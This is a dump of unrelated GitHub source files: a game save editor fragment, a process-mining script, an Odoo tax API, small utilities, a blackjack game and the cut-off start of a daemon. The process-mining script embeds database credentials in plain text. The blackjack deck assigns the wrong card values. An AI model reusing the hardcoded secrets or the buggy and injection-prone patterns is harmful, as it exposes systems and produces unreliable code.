user_input_handler.get_int(\n f\"Enter the level to upgrade &{level_str}& to (Max &{max}&):\"\n )\n if part_id == 0:\n level -= 1\n level = helper.config_clamp(level, 0, max)\n cannon[\"levels\"][level_str] = level\n else:\n develop_stage = (\n user_input_handler.colored_input(\n \"Do you want to set the stage of development (&1&) or the upgrade level? (&2&):\",\n )\n == \"1\"\n )\n if develop_stage:\n unlock_value = user_input_handler.get_int(\n \"Enter the stage of development (1=effect, 2=foundation, 3=style):\",\n )\n unlock_value = helper.config_clamp(unlock_value, 0, 3)\n for cannon_id in cannon_ids:\n cannons[cannon_id][\"unlock_flag\"] = unlock_value\n if unlock_value != 3:\n for level_str in cannons[cannon_id][\"levels\"]:\n cannons[cannon_id][\"levels\"][level_str] = 0\n else:\n max_max = 0\n for cannon_id in cannon_ids:\n for part_id in cannon_maxes[cannon_id]:\n if cannon_maxes[cannon_id][part_id] > max_max:\n max_max = cannon_maxes[cannon_id][part_id]\n\n level = user_input_handler.get_int(\n f\"Enter the level to upgrade everything to (Max &{max_max}&):\",\n )\n for cannon_id in cannon_ids:\n cannon = cannons[cannon_id]\n cannon[\"upgrade_flag\"] = 3\n for level_str in cannon[\"levels\"]:\n max = get_max(level_str, cannon_id, cannon_maxes)\n if max is None:\n continue\n part_id = get_part_id_from_str(level_str)\n level_ = level\n if part_id == 0:\n level_ -= 1\n if cannon_id == 0:\n part_id = 0\n level_ = helper.config_clamp(\n level_, 0, cannon_maxes[cannon_id][part_id]\n )\n cannon[\"levels\"][level_str] = level_\n\n return save_stats\n","repo_name":"fieryhenry/BCSFE-Python","sub_path":"src/BCSFE_Python/edits/gamototo/ototo_cat_cannon.py","file_name":"ototo_cat_cannon.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"61"}
+{"seq_id":"13975471636","text":"#Обработка данных и подключение к БД\nfrom sberpm import DataHolder\nfrom sberpm.metrics import ActivityMetric, TransitionMetric, IdMetric, TraceMetric, UserMetric\n\nimport pandas as pd\nimport clickhouse_connect\n\n#Graphviz\nfrom sberpm.visual import GraphvizPainter,ChartPainter\nimport graphviz as gz\nimport custom_painter as c_p\n\n#Различные варинаты майнеров\nfrom sberpm.miners import HeuMiner, SimpleMiner,CausalMiner,AlphaMiner,AlphaPlusMiner, InductiveMiner, CorrelationMiner\n\ndef initializating_pm():\n\n#Получение и обработка БД\n #Обработка из локального файла, лучше использовать если сидишь в отладчике, иначе будет собирать DataHolder от 10с до 40с, локально в разы быстрее\n #data_holder = DataHolder(data='test2.csv', id_column='case_id',\n # activity_column='activity',\n # start_timestamp_column='start time',\n # end_timestamp_column='end time',\n # time_format='%m/%d/%Y %I:%M:%S %p')\n\n client = clickhouse_connect.get_client(host='pheerses.space', port=8123, username='practice', password='secretKey_lhv323as5vc_d23k32mk')\n\n # Получение данных и преобразование в DataFrame\n #Соединение часто недостаточно быстрое чтобы заниматсья дебагом\n lst_data = []\n list_id = client.query('SELECT case_id, activity, start_time, end_time FROM main_table')\n for i in list_id.result_rows:\n lst_data.append(i)\n lst_name = list_id.column_names\n df = pd.DataFrame(lst_data, columns=lst_name)\n\n data_holder = DataHolder(data=df,\n id_column='case_id',\n activity_column='activity',\n start_timestamp_column='start_time',\n end_timestamp_column='end_time',\n time_format='%Y-%m-%d %I:%M:%S')\n\n data_holder.check_or_calc_duration()\n data_holder.data.head()\n data_holder.get_grouped_data(data_holder.activity_column, data_holder.start_timestamp_column).head()\n\n activity_metric = ActivityMetric(data_holder,time_unit='d')\n activity_metric.calculate_time_metrics()\n activity_metric.apply().head()\n count_metric = activity_metric.count().to_dict()\n time_metric = activity_metric.mean_duration().to_dict()\n #transition_metric = TransitionMetric(data_holder,time_unit='d')\n #transition_metric.apply().head()\n #edges_count_metric = activity_metric.count().to_dict()\n\n #trace_metric = TraceMetric(data_holder,time_unit='d')\n #trace_metric.apply().head()\n #edges_count_metric = trace_metric.mean_duration().to_dict()\n\n transition_metric = TransitionMetric(data_holder,time_unit='d')\n transition_metric.apply().head()\n edges_count_metric = transition_metric.mean_duration().to_dict()\n\n#Область объявления майнеров\n\n #Обявление списка на отрисовку\n miner_graphs = []\n\n #Hei miner\n heu_miner = HeuMiner(data_holder, threshold=0.8)\n heu_miner.apply()\n miner_graphs.append(heu_miner.graph)\n\n #Simple Miner\n #simple_miner = SimpleMiner(data_holder)\n #simple_miner.apply()\n #miner_graphs.append(simple_miner.graph)\n\n #Casual Miner\n #casual_miner = CausalMiner(data_holder)\n #casual_miner.apply()\n #miner_graphs.append(casual_miner.graph)\n\n #Alpha Miner\n #alpha_miner = AlphaMiner(data_holder)\n #alpha_miner.apply()\n #miner_graphs.append(alpha_miner.graph)\n\n #AlphaPlus Miner\n #alphaplus_miner = AlphaPlusMiner(data_holder)\n #alphaplus_miner.apply()\n #miner_graphs.append(alphaplus_miner.graph)\n\n #InductiveMiner Miner\n #inductive_miner = InductiveMiner(data_holder)\n #inductive_miner.apply()\n #miner_graphs.append(inductive_miner.graph)\n\n #CorrelationMiner Miner\n #correlation_miner = CorrelationMiner(data_holder)\n #correlation_miner.apply()\n #correlation_miner.append(correlation_miner.graph)\n\n#Графики\n #painter = ChartPainter(data_holder)\n #painter.hist_activity_of_dur(top= False, use_median=False)\n#Модуль отисовки\n for (index,elem) in enumerate(miner_graphs):\n try:\n elem.add_node_metric('count',count_metric)\n elem.add_edge_metric('count', edges_count_metric)\n except:\n print('ошибочка')\n painter = GraphvizPainter()\n #painter.apply(elem,node_style_metric='count', edge_style_metric='count')\n custom_graph(elem.nodes,elem.edges,'graph' + str(index),format='svg')\n #painter.write_graph('graph'+str(index)+'.svg',format='svg')\n\n\n#Кастомная функция для отрисовки готовых графов, создана по причине отсутствия стилизации средств встроенных в библиотеку sberPm\ndef custom_graph(nodes,edges,file,format='svg'):\n img = c_p.CustomPainter()\n img.create(nodes,edges,file)\n #ps = gz.Digraph(file, node_attr={'shape': 'plaintext', 'color': '#2d137d', 'fontcolor': '#2d137d',\n # 'fontsize': '12.0', 'size': '2', 'image': '1.png'},\n # edge_attr={'color': '#2d137d', 'fontcolor': '#2d137d'})\n\n #Перенос вершин графов и их весов из майнера в Digraph\n #Перенос вершин графов\n #for g_node in nodes:\n # metric = nodes.get(g_node).metrics.get('count')\n # if g_node == 'startevent':\n # ps.node(g_node, image='', label='')\n # elif g_node == 'endevent':\n # ps.node(g_node, image='', label='')\n # else:\n # ps.node(g_node,label=r'' + g_node + '\\n'+' ' + str(metric) + '\\l')\n\n #Перенос весов графов\n # for g_edge in edges:\n # metric = edges.get(g_edge).metrics.get('count')\n # if metric == None:\n # ps.edge(g_edge[0],g_edge[1])\n # else:\n # ps.edge(g_edge[0],g_edge[1],label=str(metric))\n\n\n #Вывод svg файла\n # ps.format = format\n # ps.render()\n\nif __name__ == '__main__':\n initializating_pm()\n\n","repo_name":"CoulMacGrath/Coul","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70912637953","text":"# -*- coding: utf-8 -*-\nimport logging\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nimport werkzeug.wrappers\n\nfrom odoo import http\nfrom odoo.http import request\n\n_logger = logging.getLogger(__name__)\nOUT__auth_gettokens__SUCCESS_CODE = 200\nOUT__auth_gettokens__ERROR_CODE = 400\n\n\ndef get_nassit(basic_pay, employee_type, age, nassit_contribution=True):\n nassit = 0.0\n nassittee = 0.0\n if employee_type == 'local':\n if age >= 60:\n return {'Nassit': nassit, 'Nassittee': nassittee}\n if not nassit_contribution:\n return {'Nassit': nassit, 'Nassittee': nassittee}\n else:\n nassit += basic_pay * 0.05\n nassittee += basic_pay * 0.10\n return {'Nassit': nassit, 'Nassittee': nassittee}\n\n\ndef calculate_sl_tax(basic_pay, gross, age, employee_type, non_tax_earning, nassit_contribution=True):\n nassits = get_nassit(basic_pay, employee_type, age, nassit_contribution)\n total_paye = 0.0\n if employee_type == 'foreign':\n total_paye += basic_pay * 0.05\n else:\n tax_income = gross - nassits['Nassit'] - non_tax_earning\n if tax_income <= 500000:\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 500000 < tax_income <= 1000000:\n total_paye += (tax_income - 500000) * 0.15\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 1000000 < tax_income <= 1500000:\n total_paye += (tax_income - 1000000) * 0.20 + 75000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 1500000 < tax_income <= 2000000:\n total_paye += (tax_income - 1500000) * 0.25 + 75000 + 100000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n if 2000000 < tax_income <= 2000000000:\n total_paye += (tax_income - 2000000) * 0.30 + 75000 + 100000 + 125000\n return {'Paye': total_paye, 'Nassit': nassits['Nassit'], 'Nassittee': nassits['Nassittee']}\n\n\ndef calculate_gmb_tax(gross, non_tax_earning):\n total_paye = 0.0\n tax_income = gross - non_tax_earning\n if tax_income <= 2000:\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 2000 < tax_income <= 2833.3:\n total_paye += (tax_income - 833.3) * 0.05\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 2833.3 < tax_income <= 3666.6:\n total_paye += (tax_income - 2833.3) * 0.10 + 41.67\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 3666.6 < tax_income <= 4499.9:\n total_paye += (tax_income - 3666.6) * 0.15 + 41.67 + 83.33\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 4499.9 < tax_income <= 5333.2:\n total_paye += (tax_income - 4499.9) * 0.20 + 41.67 + 83.33 + 124.99\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n if 5333.2 < tax_income <= 2000000000:\n total_paye += (tax_income - 5333.2) * 0.25 + 41.67 + 83.33 + 124.99 + 166.67\n return {'Monthly Income Tax': total_paye, 'Yearly Income Tax': total_paye*12}\n\n\ndef check_values(value):\n return float(value) > 0.0 and type(value) == float\n\n\nclass ControllerREST(http.Controller):\n \n @http.route('/api/tax', methods=['POST'], type='http', auth='none', csrf=False)\n def api_tax_calculation(self):\n # Convert http data into json:\n _logger.info(\"API Was reached successfully\")\n try:\n jdata = json.loads(request.httprequest.stream.read())\n except:\n jdata = {}\n if 'country' in jdata:\n country = jdata.get('country')\n if country == 'sl':\n \"\"\"\n fields required for sl\n basic_pay, gross, age, employee_type, non_tax_earning, nassit_contribution=True\n \"\"\"\n try:\n basic_pay = jdata.get('basic_pay')\n assert float(basic_pay)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter basic_pay not found or not in the required type'}),)\n\n try:\n gross = jdata.get('gross')\n assert float(gross)\n except:\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter gross not found or not in the required type'}),)\n\n try:\n age = jdata.get('age')\n assert int(age)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter age not found or not in the required type'}),)\n\n try:\n employee_type = jdata.get('employee_type')\n assert len(str(employee_type)) > 0\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter employee_type not found or not in the required type'}),)\n\n try:\n non_tax_earning = jdata.get('non_tax_earning')\n assert float(non_tax_earning)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter non_tax_earning not found or not in the required type'}),)\n\n try:\n nassit_contribution = jdata.get('nassit_contribution')\n assert bool(nassit_contribution)\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter nassit_contribution not found or not in the required type'}),)\n\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps(calculate_sl_tax(float(basic_pay),\n float(gross),\n int(age),\n str(employee_type),\n float(non_tax_earning),\n bool(nassit_contribution))),)\n if country == 'gmb':\n \"\"\"\n calculate_gmb_tax(gross, non_tax_earning)\n fields required for sl\n gross, non_tax_earning\n \"\"\"\n try:\n gross = jdata.get('gross')\n assert float(gross)\n assert float(gross) > 0.0\n except :\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter gross not found or not in the required type.'\n ' Gross must be a float greater than 0.0'}),)\n\n try:\n non_tax_earning = float(jdata.get('non_tax_earning'))\n assert float(non_tax_earning) > 0.0\n except:\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter non_tax_earning not found or not '\n 'in the required type. Value must be a float greater than 0.0'}),)\n\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps(calculate_gmb_tax(gross, non_tax_earning)),)\n if country == 'ng':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n if country == 'sa':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n if country == 'lib':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}), )\n\n","repo_name":"Jacky-odoo/Ecobank","sub_path":"odoo/addons/base/res/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70310319234","text":"from heapq import heapify, heappush, heappop\n\n\n\ndef extract_k_max(lst, k):\n heap = lst[:k]\n heapify(heap)\n\n for i in lst[k:]:\n if i > heap[0]:\n heappop(heap)\n heappush(heap, i)\n return heap\n\n\nprint(extract_k_max([2, 5, 11, 3, 0, 20, 9, 98, 1, 99, 14, 100], 4))","repo_name":"avi3tal/knowledgebase","sub_path":"interviewbit/courses/programming/heaps_and_maps/extract_k_max_elements.py","file_name":"extract_k_max_elements.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24674841593","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 14 23:21:39 2023\r\n\r\n@author: ktk\r\n\"\"\"\r\n\r\n#AI Blackjack\r\nimport random\r\n# Define card ranks, suits, and values\r\nranks = [\"Two\", \"Three\", \"Four\", \"Five\", \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\r\nsuits = [\"Hearts\", \"Diamonds\", \"Clubs\", \"Spades\"]\r\nvalues = [2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10, 11]\r\n# Create a deck of cards\r\ndeck = [{\"Rank\": rank, \"Suit\": suit, \"Value\": value} for rank in ranks for suit in suits for value in values]\r\n# Function to calculate the total value of a hand\r\ndef calculate_hand_value(hand):\r\n value = sum(card[\"Value\"] for card in hand)\r\n if value > 21 and any(card[\"Rank\"] == \"Ace\" for card in hand):\r\n value -= 10 # Adjust for the value of Aces\r\n return value\r\n# Function to display a player's hand\r\ndef display_hand(hand):\r\n for card in hand:\r\n print(f\"{card['Rank']} of {card['Suit']}\")\r\n# Initialize player and dealer hands\r\nplayer_hand = [random.choice(deck), random.choice(deck)]\r\ndealer_hand = [random.choice(deck), random.choice(deck)]\r\n# Main game loop\r\nwhile True:\r\n print(\"\\nPlayer's Hand:\")\r\n display_hand(player_hand)\r\n player_value = calculate_hand_value(player_hand)\r\n print(f\"Total Value: {player_value}\")\r\n if player_value == 21:\r\n print(\"Blackjack! You win!\")\r\n break\r\n elif player_value > 21:\r\n print(\"Bust! You lose.\")\r\n break\r\n action = input(\"Do you want to 'Hit' or 'Stand'? \").strip().lower()\r\n if action == 'hit':\r\n player_hand.append(random.choice(deck))\r\n elif action == 'stand':\r\n while calculate_hand_value(dealer_hand) < 17:\r\n dealer_hand.append(random.choice(deck))\r\n print(\"\\nDealer's Hand:\")\r\n display_hand(dealer_hand)\r\n dealer_value = calculate_hand_value(dealer_hand)\r\n print(f\"Total Value: {dealer_value}\")\r\n if dealer_value > 21:\r\n print(\"Dealer busts! You win!\")\r\n elif dealer_value >= player_value:\r\n print(\"Dealer wins.\")\r\n else:\r\n print(\"You win!\")\r\n break\r\n else:\r\n print(\"Invalid choice. Please enter 'Hit' or 'Stand'.\")\r\n","repo_name":"kayteekay1412/Game-Gallery","sub_path":"Blackjack.py","file_name":"Blackjack.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41977435447","text":"from shutil import copytree\nimport os\nfrom pathlib import Path\nfrom string import Template\nimport logging\n\n\nclass LexetHome():\n def __init__(self, config, home):\n self.config = config\n self.home = home\n\n def exists(self):\n return Path(self.home).expanduser().exists()\n\n def create(self):\n logging.info('creation lexet root')\n self.create_home_dir()\n self.init_config()\n\n def create_home_dir(self):\n logging.info(\n Template('creation home directory \"$home\"')\n .substitute(\n home = self.home\n )\n )\n command_parts = ['mkdir']\n command_parts.append('--parent')\n command_parts.append('--verbose')\n command_parts.append(self.home)\n os.system(' '.join(command_parts))\n\n def init_config(self):\n self.prepare_atom_home()\n\n def prepare_atom_home(self):\n logging.info(\n Template('copy atom home to \"$atom_home\"')\n .substitute(\n atom_home = self.config['root']['atom_home']\n )\n )\n\n copytree(\n Path(\n self.config['init']['atom_home']\n ),\n Path(\n self.config['root']['atom_home']\n ).expanduser(),\n )\n","repo_name":"lexatnet/lexet","sub_path":"src/lib/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"11962267437","text":"T = int(input())\n\nfor Test in range(T):\n A = int(input())\n arr = list(map(int,input().split()))\n People = [0]*101\n ans = 0\n a = 0\n count = 0\n for Score in arr:\n for i in range(101):\n if i == Score:\n People[i] += 1\n for k in People:\n if a <= k:\n ans = count\n a = k\n count += 1\n print(f'#{Test+1} {ans}')","repo_name":"sw200662/Algorithm_my","sub_path":"2107/0727/swea1204.py","file_name":"swea1204.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7347626363","text":"\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/guides/distributing-packages-using-setuptools/\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\nimport pathlib\nimport re\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\nhere = pathlib.Path(__file__).parent.resolve() # current path\nlong_description = (here / 'README.md').read_text(encoding='utf-8') # Get the long description from the README file\nwith open(here / 'requirements.txt') as fp: # read requirements.txt\n install_reqs = [r.rstrip() for r in fp.readlines() if not r.startswith('#')]\n\n\ndef get_version():\n file = here / 'src/ultralytics/__init__.py'\n return re.search(r'^__version__ = [\\'\"]([^\\'\"]*)[\\'\"]', file.read_text(), re.M).group(1)\n\n\nsetup(\n name='ultralytics', # Required https://packaging.python.org/specifications/core-metadata/#name\n version=get_version(), # Required https://packaging.python.org/en/latest/single_source_version.html\n description='Ultralytics YOLOv5 Python package, https://ultralytics.com', # Optional\n long_description=long_description, # Optional\n long_description_content_type='text/markdown', # Optional\n url='https://github.com/ultralytics/pip', # Optional, project's main homepage\n author='Glenn Jocher', # Optional, name or the name of the organization which owns the project\n author_email='glenn.jocher@ultralytics.com', # Optional\n classifiers=['Development Status :: 5 - Production/Stable', # 3 - Alpha, 4 - Beta, 5 - Production/Stable\n 'Intended Audience :: Developers', # Indicate who your project is intended for\n 'Operating System :: OS Independent',\n 'Topic :: Education', # Topics\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Topic :: Scientific/Engineering :: Image Recognition',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', # Pick your license as you wish\n 'Programming Language :: Python :: 3.7', # Python version support\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ], # Classifiers help users find your project by categorizing it https://pypi.org/classifiers/\n keywords='machine-learning, deep-learning, ml, pytorch, YOLO, object-detection, YOLOv3, YOLOv4, YOLOv5', # Optional\n package_dir={'': 'src'}, # Optional, use if source code is in a subdirectory under the project root, i.e. `src/`\n packages=find_packages(where='src'), # Required\n python_requires='>=3.7, <4',\n\n # For an analysis of \"install_requires\" vs pip's requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n install_requires=install_reqs, # Optional, additional pip packeges to be installed by this pacakge installation\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). Users will be able to install these using the \"extras\"\n # syntax, for example: $ pip install sampleproject[dev]\n # Similar to `install_requires` above, these must be valid existing projects\n extras_require={'dev': ['check-manifest'],\n 'test': ['coverage'],\n }, # Optional\n\n package_data={'ultralytics': ['package_data.dat'],\n }, # Optional, Data files included in your packages that need to be installed\n\n # Although 'package_data' is the preferred approach, in some case you may\n # need to place data files outside of your packages. See:\n # http://docs.python.org/distutils/setupscript.html#installing-additional-files\n #\n # In this case, 'data_file' will be installed into '/my_data'\n data_files=[('my_data', ['data/data_file'])], # Optional\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # `pip` to create the appropriate form of executable for the target\n # platform.\n #\n # For example, the following would provide a command called `ultralytics` which\n # executes the function `main` from this package when invoked:\n entry_points={'console_scripts': ['ultralytics=ultralytics.console:main', ],\n }, # Optional\n\n project_urls={'Bug Reports': 'https://github.com/ultralytics/yolov5/issues',\n 'Funding': 'https://www.ultralytics.com',\n 'Source': 'https://github.com/ultralytics/yolov5/',\n }, # Optional https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n)\n","repo_name":"ultralytics/pip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"5202348544","text":"word_list = ['cat','dog','rabbit']\n\ndef add_and_return(a_char, a_set):\n a_set.add(a_char)\n return a_char\n\nseen = set()\n\nprint('Check:', [a_letter for a_word in word_list for a_letter in a_word])\n\nprint('Extra challenge:', [ add_and_return(a_letter, seen) for a_word in word_list for a_letter in a_word if a_letter not in seen ])\n","repo_name":"skymoore/data_structures_and_algorithms_1","sub_path":"ch1/1_4_3b.py","file_name":"1_4_3b.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38558684794","text":"def string_calcuation(mystring):\n interrogatives = (\"how\", \"what\", \"why\", \"where\", \"who\")\n new_string = mystring.capitalize()\n if mystring.startswith(interrogatives):\n return \"{}?\".format(new_string)\n else:\n return \"{}.\".format(new_string)\n\nresults = []\n\nwhile True:\n input_string = input(\"Say something: \")\n if input_string == \"\\end\":\n break\n results.append(string_calcuation(input_string))\n\nprint(\" \".join(results))","repo_name":"adamb0403/PythonMegaCourse","sub_path":"simple_program.py","file_name":"simple_program.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16226858934","text":"import collections\nfrom collections import Counter\n\nclass MostCommonWord:\n def find_most_common_word(self, paragraph, banned_word):\n for char in \"!?',;.\":\n paragraph = paragraph.replace(char, \" \")\n count = collections.Counter(\n word for word in paragraph.lower().split())\n count = count.most_common()\n print(count)\n banned_word = set(banned_word)\n for word in count:\n if word[0] not in banned_word:\n return word\n\nmostcommonword = MostCommonWord()\nmostcommonword.find_most_common_word(\"Bob. hIt, baLl\",[\"bob\", \"hit\"])","repo_name":"damerakd/Python-Scripts","sub_path":"most-common-word.py","file_name":"most-common-word.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16416778317","text":"import os\nimport sys\nimport time\nimport json\nfrom threading import Thread\nimport atexit, signal\nimport subprocess, argparse, grp, pwd\nimport ConfigParser\nimport smtplib\nimport socket\nimport urllib\nimport syslog\n\nsyslog.openlog('blocky', logoption=syslog.LOG_PID, facility=syslog.LOG_LOCAL0)\n\nconfig = ConfigParser.ConfigParser()\n\nes = None\nhostname = socket.gethostname()\nif hostname.find(\".apache.org\") == -1:\n\thostname = hostname + \".apache.org\"\nsyslog.syslog(syslog.LOG_INFO, \"Starting blocky on %s\" % hostname)\n\nclass Daemonize:\n\t\"\"\"A generic daemon class.\n\n\tUsage: subclass the daemon class and override the run() method.\"\"\"\n\n\tdef __init__(self, pidfile): self.pidfile = pidfile\n\n\tdef daemonize(self):\n\t\t\"\"\"Deamonize class. UNIX double fork mechanism.\"\"\"\n\n\t\ttry:\n\t\t\tpid = os.fork()\n\t\t\tif pid > 0:\n\t\t\t\t# exit first parent\n\t\t\t\tsys.exit(0)\n\t\texcept OSError as err:\n\t\t\tsys.stderr.write('fork #1 failed: {0}\\n'.format(err))\n\t\t\tsys.exit(1)\n\n\t\t# decouple from parent environment\n\t\tos.chdir('/')\n\t\tos.setsid()\n\t\tos.umask(0)\n\n\t\t# do second fork\n\t\ttry:\n\t\t\tpid = os.fork()\n\t\t\tif pid > 0:\n\n\t\t\t\t# exit from second parent\n\t\t\t\tsys.exit(0)\n\t\texcept OSError as err:\n\t\t\tsys.stderr.write('fork #2 failed: {0}\\n'.format(err))\n\t\t\tsys.exit(1)\n\n\t\t# redirect standard file descriptors\n\t\tsys.stdout.flush()\n\t\tsys.stderr.flush()\n\t\tsi = open(os.devnull, 'r')\n\t\tso = open(os.devnull, 'a+')\n\t\tse = open(os.devnull, 'a+')\n\n\t\tos.dup2(si.fileno(), sys.stdin.fileno())\n\t\tos.dup2(so.fileno(), sys.stdout.fileno())\n\t\tos.dup2(se.fileno(), sys.stderr.fileno())\n\n\t\t# write pidfile\n\t\tatexit.register(self.delpid)\n\n\t\tpid = str(os.getpid())\n\t\twith open(self.pidfile,'w+') as f:\n\t\t\tf.write(pid + '\\n')\n\n\tdef delpid(self):\n\t\tos.remove(self.pidfile)\n\n\tdef start(self, args):\n\t\t\"\"\"Start the daemon.\"\"\"\n\n\t\t# Check for a pidfile to see if the daemon already runs\n\t\ttry:\n\t\t\twith open(self.pidfile,'r') as pf:\n\n\t\t\t\tpid = int(pf.read().strip())\n\t\texcept IOError:\n\t\t\tpid = None\n\n\t\tif pid:\n\t\t\tmessage = \"pidfile {0} already exist. \" + \\\n\t\t\t\t\t\t\t\"Daemon already running?\\n\"\n\t\t\tsys.stderr.write(message.format(self.pidfile))\n\t\t\tsys.exit(1)\n\n\t\t# Start the daemon\n\t\tself.daemonize()\n\t\tself.run(args)\n\n\tdef stop(self):\n\t\t\"\"\"Stop the daemon.\"\"\"\n\n\t\t# Get the pid from the pidfile\n\t\ttry:\n\t\t\twith open(self.pidfile,'r') as pf:\n\t\t\t\tpid = int(pf.read().strip())\n\t\texcept IOError:\n\t\t\tpid = None\n\n\t\tif not pid:\n\t\t\tmessage = \"pidfile {0} does not exist. \" + \\\n\t\t\t\t\t\t\t\"Daemon not running?\\n\"\n\t\t\tsys.stderr.write(message.format(self.pidfile))\n\t\t\treturn # not an error in a 